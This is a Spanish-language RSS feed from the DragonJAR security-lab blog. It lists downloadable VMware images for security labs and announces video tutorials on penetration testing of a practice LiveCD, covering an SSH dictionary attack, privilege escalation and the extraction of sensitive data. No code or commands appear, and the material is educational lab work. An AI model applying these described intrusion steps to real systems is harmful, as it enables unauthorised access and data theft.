<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Labs DragonJAR &#187; Máquinas Virtuales</title>
	<atom:link href="http://labs.dragonjar.org/tag/maquinas-virtuales/feed" rel="self" type="application/rss+xml" />
	<link>http://labs.dragonjar.org</link>
	<description>Laboratorios de Seguridad Informática: Comunidad DragonJAR</description>
	<lastBuildDate>Sun, 06 Jun 2010 10:34:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Recopilación de Máquinas Virtuales para VMWare Player, WorkStation y Server como entornos de uso para Laboratorios de Seguridad</title>
		<link>http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad</link>
		<comments>http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad#comments</comments>
		<pubDate>Fri, 29 May 2009 19:53:12 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Entornos virtualizados]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Sistemas Operativos]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[VMWare Tools]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=797</guid>
		<description><![CDATA[El siguiente listado de Imágenes de Máquinas Virtuales pretende ser un recopilatorio de  recursos de ambientes virtualizados enfocados al desarrollo de Laboratorios de Seguridad Informática. (PenTesting, Análisis de Malware, Hardening, Protección y Análisis de Datos, etc.) Estas imágenes serán muy útiles cuando se pretendan realizar laboratorios que requieran diferentes Sistemas Operativos como máquinas &#8220;atacantes&#8221;  y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El siguiente listado de Imágenes de Máquinas Virtuales pretende ser un recopilatorio de  recursos de ambientes virtualizados enfocados al desarrollo de Laboratorios de Seguridad Informática. (<a href="http://labs.dragonjar.org/tag/penetration-testing" target="_blank">PenTesting</a>, <a href="http://labs.dragonjar.org/tag/analisis-de-malware" target="_blank">Análisis de Malware</a>, <a href="http://labs.dragonjar.org/tag/hardening" target="_blank">Hardening</a>, <a href="http://labs.dragonjar.org/taller-tecnicas-criptograficas-introduccion-y-contenido" target="_blank">Protección y Análisis de Datos</a>, etc.)</p>
<p style="text-align: justify;">Estas imágenes serán muy útiles cuando se pretendan realizar laboratorios que requieran diferentes Sistemas Operativos como máquinas &#8220;atacantes&#8221;  y máquinas &#8220;víctimas&#8221;.</p>
<p style="text-align: justify;">Están desarrolladas para ser utilizadas con cualquiera de los productos de <a href="http://www.vmware.com" target="_blank">VMWare</a>. Recomiendo el uso de <a href="http://www.vmware.com/products/player/" target="_blank">VMWare Player</a> y <a href="http://www.vmware.com/products/server/" target="_blank">Server</a> como solución al tema de licenciamiento, aunque es posible utilizar <a href="http://www.vmware.com/products/ws/" target="_blank">VMWare WorkStation</a> en modo Trial por 30 días. Todas estos entornos ya traen instaladas las <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-windows-2003-server" target="_blank">VMWare Tools</a> para facilitar la transferencia de datos entre uno y otro sistema.</p>
<p style="text-align: justify;">Pronto publicaré otras máquinas virtuales para otras soluciones de virtualización (Virtual PC, Qemu, Virtual Box).</p>
<p style="text-align: justify;"><strong>Imágenes tomadas de <a href="http://bagside.com/bagvapp/index.html" target="_blank">BagSide</a>:</strong></p>
<ul style="text-align: justify;">
<li><strong>BackTrack 4 beta (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Back|Track 4 beta, with KDE 3.5.10 Desktop and Kernel 2.6.28.1. Now based on Ubuntu Intrepid. Loads of specialized applications for admins. VMwareTools 7.8.4-126130 installed along with SLIM Login manager, some extra scripts and the gtk-qt-engine. Released 11th Feb. 2009. The appliance occupies 4.2GB of the virtual disk which is 25GB in total. Default RAM is set at 688MB and the download is 839 MB. Regarded as one of the top Security distros.</li>
<li><a href="http://www.remote-exploit.org/backtrack.html" target="_blank">Página oficial de BackTrack.</a></li>
<li><a href="http://174.36.1.2/bt4.7z" target="_blank">Descargar máquina virtual.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>BackTrack 3 (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li><a href="http://174.36.1.2/bt3.7z" target="_blank">Descargar máquina virtual BackTrack 3.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Caine / Computer Aided INvestigative Environment (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>CAINE (Computer Aided INvestigative Environment) is a GNU/Linux Digital Forensics distro for Interdepartment Center for Research on Security (CRIS), supported by the University of Modena and Reggio Emilia in Italy. Based on Ubuntu 8.04.1 with Kernel 2.6.24-24 and GNOME 2.22.3. Fully updated on the 2nd of March 2009. Released on the 22nd of Feb. 2009. The dynamic disk is 40GB and the appliance occupies 3.5GB installed and the download is 683 MB. 588 MB RAM is allocated as default.</li>
<li><a href="http://www.caine-live.net/" target="_blank">Página Oficial de Caine.</a></li>
<li><a href="http://174.36.1.2/caine05.7z" target="_blank">Descargar máquina virtual Caine.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Helix 2008R1 (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Ubuntu 8.04 based Incident Response. Discovery, Forensics and Security Distro<br />
Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on the 03/10/2008. The source and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 23/09/2008. The appliance occupies 2.8GB of the virtual disk which is 14GB in total. Default RAM is set at 568MB and the download is 708MB in total. Works well here. For those of you who wants to use or try applications like Adepto, Autopsy, GtkHash, Linen, Ophcrack etc.</li>
<li><a href="http://www.e-fense.com/helix/" target="_blank">Página oficial de Helix.</a></li>
<li><a href="http://174.36.1.2/helix.7z" target="_blank">Descargar máquina virtual Helix.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>nUbuntu (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Ubuntu 8.10 remaster loaded with Security tools for Bluetooth, Cisco, Scanners, Password, Exploits, Database, Fuzzers, Enum, VoiP and Wireless. Some build-tools and VMwareTools 7.8.4-125130 are installed. Release date 17/12/2008. The physical disk is 9GB whereoff 2.7 GB is used for the appliance. The download is 566 MB and RAM set at 548 MB.</li>
<li><a href="http://www.nubuntu.org/" target="_blank">Página oficial de nUbuntu.</a></li>
<li><a href="http://174.36.1.2/nub.7z" target="_blank">Descargar máquina virtual nUbuntu.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Samurai Web Testing Framework (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Security and web penetration test suite based on Ubuntu 8.04<br />
Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on 08/10/2008. Headers and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 10/08/1008. The appliance occupies 3.0GB of the virtual disk which is 14GB in total. Default RAM is set at 548MB and the download is 675MB in total. Works well here. Loaded with intrusion tools: DirBuster, Fierce Domain Scanner, Gooscan, Grendel-Scan, HTTP_Print fingerprinting tool, Maltego CE, Nikto, Paros, Rat Proxy, Spike Proxy , SQLBrute, w3af (and the GUI), Wapiti, WebScarab, WebShag, ZenMap, dnswalk, httping, httrack, john the ripper, netcat, nmap, siege, snarf etc.</li>
<li><a href="http://samurai.inguardians.com/" target="_blank">Página oficial de Samurai Web Testing Framework.</a></li>
<li><a href="http://174.36.1.2/samurai.7z" target="_blank">Descargar máquina virtual Samurai Web Testing Framework.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>WeakNet Linux (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Security distro from WeakNetLabs. Based on Ubuntu 8.04.1 with Kernel 2.6.24-21 and GNOME 2.22.3. Fully updated on the 22nd of November. Released on the 20th of November 2008. Substantial amount of security tools including WeakNetLabs own code and a &#8216;dashboard&#8217; with main applications. The dynamic disk is 20GB and the appliance occupies 3.6GB installed and the download is 848 MB. 612 MB RAM is allocated as default.</li>
<li><a href="http://weaknetlabs.com/linux/" target="_blank">Página oficial de WeakNet Linux.</a></li>
<li><a href="http://174.36.1.2/weaknet.7z" target="_blank">Descargar máquina virtual Weaknet.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>CentOS (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Red Hat Enterprise based with GNOME 2.16 desktop. Installed kernel-devel, cpp, gcc, build-tools and VMwareTools 7.8.4-126130, Adobe flash plugin, Yum-extender, Yum-utils and gtk-murrine-engine and some iconsets. Release date 31/03/2009. CentOS is ranked no.10 on Distrowatch. The physical disk is 40GB whereoff 4.1 GB i used for the appliance. The download is 813MB. Very mature and stable although not bleeding edge.</li>
<li><a href="http://www.centos.org/" target="_blank">Página oficial de CentOS.</a></li>
<li><a href="http://174.36.1.2/centos52.7z" target="_blank">Descargar máquina virtual CentOS.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>FreeBSD (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Standard with the following added, Opera 9.63, MySQL Server Client, Ruby, Apache, Ark, compat6, Nano and a few more plus VMwareTools. Occupies 4.5 GB on disk off a virtual dynamic disk of 20 GB. 644 MB RAM allocated and the download is 904 MB. Works here after some serious tweaking and fixing. I must say that I have still problems getting to grips with all BSD&#8217;s as VMware guest OS desktops although this is probably the best one I have built so far.</li>
<li><a href="http://www.freebsd.org/es/" target="_blank">Página oficial de FreeBSD.</a></li>
<li><a href="http://174.36.1.2/freebsd.7z" target="_blank">Descargar máquina virtual FreeBSD.</a></li>
</ul>
</li>
</ul>
<p><strong>Imágenes tomadas de <a href="http://www.vmware.com/appliances/" target="_blank">Virtual Appliance Marketplace</a>:</strong></p>
<ul style="text-align: justify;">
<li><strong>Astaro Mail / Web / Security Gateway </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Astaro Mail Gateway provides complete protection and control over spam, viruses, worms and Trojans transferred through email. The All-In-One mail security appliance features comprehensive features for spam detection and malware filtering.</li>
<li>Astaro Web Gateway provides complete protection and control over data transferred over the web. The All-In-One web security appliance features Malware Detection, Application Control, URL Filtering and Bandwidth Management, fully integrated and manageable through a single and intuitive browser-based user interface.</li>
<li>Astaro Security Gateway integrates complete Network, Web and Mail Security through an intuitive browser-based user interface. The Astaro Unified Threat Management appliance is the most easy-to-use and cost-effective &#8220;all-in-one&#8221; solution available, working to effectively shield businesses from internet based threats everyday.</li>
<li><a href="http://www.astaro.com/" target="_blank">Página oficial de Astaro Mail Gateway.</a></li>
<li><a href="ftp://ftp.astaro.de/pub/AMG/v7/virtual_appliance/" target="_blank">Descargar Astaro Mail gateway.</a></li>
<li><a href="ftp://ftp.astaro.de/pub/AWG/v7/virtual_appliance/" target="_blank">Descargar Astaro Web Gateway.</a></li>
<li><a href="ftp://ftp.astaro.com/pub/Astaro_Security_Gateway/v7/virtual_appliance/" target="_blank">Astaro Security Gateway.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>WiKID Strong Authentication Server Community Edition 3.3.8 </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>The WiKID Strong Authentication System is a dual-source, software-based two-factor authentication system designed to be less expensive and more extensible than hardware tokens.</li>
<li><a href="http://www.wikidsystems.com/support/wikid-support-center/faq/whats-the-difference-between-the-community-release-and-enterprise-release/" target="_blank">Página oficial de WiKID Strong Authentication Server Community Edition.</a></li>
<li><a href="https://sourceforge.net/project/showfiles.php?group_id=144774&amp;package_id=321765" target="_blank">Descargar máquina virtual WiKID Strong Authentication Server Community Edition.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Accellion Secure File Transfer </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Secure File Transfer Virtual Appliance &#8211; secure, economical and easy to use secure file transfer for today&#8217;s global enterprises.</li>
<li><a href="http://www.accellion.com/" target="_blank">Página oficial de Accellion Secure File Transfer.</a></li>
<li><a href="http://www.accellion.com/virtual-greenex.html" target="_blank">Descargar máquina virtual  Accellion Secure File Transfer.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>ShellNET MiniVM </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Web Interface for managing Nessus Vulnerability Scans and results.</li>
<li><a href="http://turtleshell.net/" target="_blank">Página oficial de ShellNET MiniVM.</a></li>
<li><a href="http://turtleshell.net/index.php?option=com_remository&amp;Itemid=43&amp;func=startdown&amp;id=4" target="_blank">Descargar máquina virtual ShellNET MiniVM.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>JanusVM </strong><strong>(Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Internet Privacy Appliance :: Encrypts your Internet traffic, hides your IP address, and is easy to setup.</li>
<li><a href="http://www.janusvm.com/" target="_blank">Página oficial de<strong> </strong>JanusVM<strong>.</strong></a></li>
<li><a href="http://www.janusvm.com/download.html" target="_blank">Descargar máquina virtual <strong> </strong>JanusVM.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>OWASP Live CD (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>The overarching goal for this project is to make application security tools and documentation easily available. I see this as a great complement to OWASP&#8217;s goal to make application security visible.</li>
<li><a href="http://www.owasp.org/index.php/LiveCD" target="_blank">Página oficial de OWASP Live CD.</a></li>
<li><a href="http://mtesauro.com/files/owasp-livecd-AustinTerrier-Feb2009.vmdk.rar" target="_blank">Descargar máquina virtual de OWASP Live CD.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Fireball ISO Builder </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Fireball ISO Builder is a VMWare virtual appliance that builds a bootable Gentoo Linux-base ISO image, focused on providing security and networking services to a network. IPv4 and IPv6. go6.net tunnel broker. DHCP, DNS, SSHD services.</li>
<li><a href="http://fireballiso.sourceforge.net/" target="_blank">Página oficial de Fireball ISO Builder.</a></li>
<li><a href="http://sourceforge.net/project/downloading.php?group_id=254850&amp;filename=FireballRelease1.7z" target="_blank">Descargar máquina virtual de Fireball ISO Builder.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Nepenthes VMware Appliance (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Nepenthes is a low interaction honeypot like honeyd or mwcollect. Low Interaction Honeypots emulate known vulnerabilities to collect information about potential attacks. Nepenthes is designed to emulate vulnerabilties worms use to spread, and to capture these worms. As there are many possible ways for worms to spread, Nepenthes is modular. There are module interface to Resolve DNS Asynchronous, Emulate Vulnerabilities, Download Files, Submit the Downloaded Files, Trigger Events, Shellcode Handler.</li>
<li><a href="http://www.dalmatech.com/" target="_blank">Página oficial de Nepenthes VMware Appliance.</a></li>
<li><a href="http://www.dalmatech.com/downloads/Nepenthes.20.zip" target="_blank">Descargar máquina virtual Nepenthes.</a></li>
</ul>
</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna#comments</comments>
		<pubDate>Tue, 20 Jan 2009 20:03:55 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[OpenSSL]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=528</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Luego de haber conseguido los diferentes datos de inicio de sesión de los usuarios en el sistema, procederemos a analizar y acceder la información crítica del sistema objetivo. Esto es necesario como PenTesters, pues vuelvo y repito, la finalidad de cada Test de Penetración es demostrar que tan vulnerable es el sistema, y que tan expuesto puede estar frente a los ataques de los delincuentes informáticos.</p>
<div align="center"><img alt="" src="http://img407.imageshack.us/img407/1382/openssldp4.jpg" title="OpenSSL" class="aligncenter" width="400" height="348" /></div>
<p>En el siguiente video tutorial veremos como accedemos al sistemas con los datos obtenidos, veremos además como recolectamos la información sensible del mismo, como la podemos descifrar y como modificamos el archivo de configuración del servidor FTP para transferir los datos.<br />
<span id="more-528"></span><br />
Con esta sesión damos por terminado el &#8220;resumen&#8221; de los laboratorios 5 y 6 realizados en la ciudad de Medellín, y al Laboratorio Virtual relizado en el pasado mes de diciembre. Solo bastará otro post a modo de conclusiones sobre el mismo y la invitación a que participen en los próximos <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><embed src="http://blip.tv/play/Ae3kDpSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/81634127/976301f8/PenTest5_LabsDragonJARorg.html ">Descargar video tutorial Test de Penetración &#8211; Acceso a la Información sensible</a></strong> (<strong>Password: </strong>www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking#comments</comments>
		<pubDate>Sun, 18 Jan 2009 19:24:05 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[John The Ripper]]></category>
		<category><![CDATA[Laboratorio de seguridad informática]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Shadow]]></category>
		<category><![CDATA[SSH]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=525</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Una vez recolectada toda la información del sistema (servicios, versiones, S.O, etc) y luego de haber realizado algunos intentos de conexión sobre ellos podemos perfilar algunos puntos de intrusión en el Sistema.</p>
<div align="center"><img alt="" src="http://img147.imageshack.us/img147/8812/xhydrazg7.jpg" title="Xhydra-PenTest" class="aligncenter" width="400" height="394" /></div>
<p>Sin lugar a dudas el servicio de SSHD &#8211; Secure Shell Daemon es el más opcionado para ser nuestro primer objetivo.<br />
<span id="more-525"></span><br />
En el siguiente video tutorial veremos como recolectamos información sensible de la compañía desde la propia página Web, además como hacemos uso de esa misma información para llevar a cabo un ataque basado en diccionario al servicio SSH.<br />
Luego veremos como con base a la información y la interacción con el sistema se hace necesario escalar privilegios en el mismo. Todo esto y más en el video tutorial.</p>
<p><embed src="http://blip.tv/play/Ae3kSJSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/81287772/6007a169/PenTest4_LabsDragonJARorg.html">Descargar video tutorial de Test de Penetración &#8211; System Hacking</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux#comments</comments>
		<pubDate>Thu, 15 Jan 2009 22:11:38 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=519</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Al igual que la sesión anterior, esta muestra como llevar a cabo el proceso de configuración del entorno virtualizado de intrusión bajo Linux y VMWare WorkStation.</p>
<p>En el siguiente video tutorial veremos como crear una nueva maquina virtual en VMWare WorkStation, como confirgurarla para que trabaje como el entorno virtualizado de intrusión objeto de estudio de estos Laboratorios Virtuales y como acceder a las intrucciones de desarrollo del mismo, utilizando como cliente BackTrack.</p>
<p><embed src="http://blip.tv/play/Ae3iAZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/80821521/efcabf57/config_labVirtualLinux_LabsDragonJARorg.html ">Descargar video tutorial de configuración del entorno virtualizado de intrusión en Linux</a></strong> (<strong>Password:</strong> www.dragonjar.org) &#8211; <strong>formato del video:</strong> .ogg</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion#comments</comments>
		<pubDate>Wed, 14 Jan 2009 22:48:08 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=510</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Una vez concluída la introducción y luego de dejar claro algunos conceptos podemos comenzar con la configuración de los ambientes virtuales de intrusión.</p>
<div align="center"><img alt="" src="http://img413.imageshack.us/img413/529/penetrationmb0.jpg" title="PenTesting" class="aligncenter" width="450" height="300" /></div>
<p>En el siguiente video tutorial profundizo un poco más sobre el proyecto de LiveCD&#8217;s como herramientas de prácticas de Test de Intrusión; Desarrollo original de Thomas Wilhem (<strong><a href="http://heorot.net/livecds/">De-ICE.net PenTest LiveCDs Project</a></strong>).<br />
Además muestro el proceso de configuración y ejecución de los entornos virtuales de intrusión sobre VMWare WorkStation y Qemu.</p>
<p>En los próximos video tutoriales mostraré como llevar a cabo el montaje de estos entornos bajo ambientes Linux y el desarrollo del propio Test de Penetración desde BackTrack.</p>
<p><embed src="http://blip.tv/play/Ae3hRZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/80657868/57e3b318/Pentest2_LabsDragonJARorg.html ">Descargar video tutorial de configuración de los ambientes virtuales de intrusión</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1#comments</comments>
		<pubDate>Wed, 14 Jan 2009 08:40:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=494</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El siguiente video tutorial hace la introducción y resumen de los laboratorios realizados en modo presencial y virtual referentes a Test de Penetración, Hacking: Técnicas y Contramedidas, Web Application PenTest e Informática Forense.</p>
<p align="center"><img alt="" src="http://img299.imageshack.us/img299/2074/pentestlu0.jpg" title="PenTest" class="aligncenter" width="450" height="332" /></p>
<p>La presentación no busca recrear por completo los temas tratados en cada uno de estos laboratorios, en lugar de ello presenta los apartes más importantes de los mismos, tratando de profundizar mucho más en los aspectos prácticos y técnicos.</p>
<p><span id="more-494"></span></p>
<p>Se hace necesario aclarar que en este video tutorial se presentan algunos conceptos a manera muy general, sin llegar al detalle como se ha hecho en cada una de las sesiones presenciales y virtuales, pues este solo busca nivelar y resumir sobre las sesiones realizadas a las personas que por diferentes razones no han podido estar presentes en estos, además de invitar a la comunidad e interesados a participar en los próximos.</p>
<p>La siguiente es la agenda a cubrir en la sesión:</p>
<p>- ¿Quiénes somos?<br />
- Conceptos básicos sobre Seguridad Informática / Test de Penetración<br />
- Estado actual de los Laboratorios de Seguridad Informática<br />
- ¿Qué son los Laboratorios de Seguridad Informática Labs.DragonJAR.org?<br />
- Laboratorios realizados<br />
- Objetivo del Laboratorio<br />
- Contenido del Laboratorio<br />
- Materiales necesarios para desarrollar el Laboratorio<br />
- Desarrollo del Laboratorio<br />
- Conclusiones</p>
<p>Este video tutorial llega hasta la presentación y resumen de los laboratorios realizados hasta la fecha, definición de aspectos básicos la seguridad de la información/Test de Penetración e introducción en el ambiente virtualizado a desarrollar.</p>
<p>En los próximos veremos como podemos llevar a cabo el proceso de configuración y desarrollo del Test de Penetración.</p>
<p><embed src="http://blip.tv/play/Ae3dKZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><a href="http://www.4shared.com/file/80554284/59608a2b/PenTest1_LabsDragonJARorg.html">Descargar video tutorial de presentación e introducción en el Laboratorio de Test de Penetración</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Laboratorio Virtual: Test de Penetración 1 (Introducción y Desarrollo)</title>
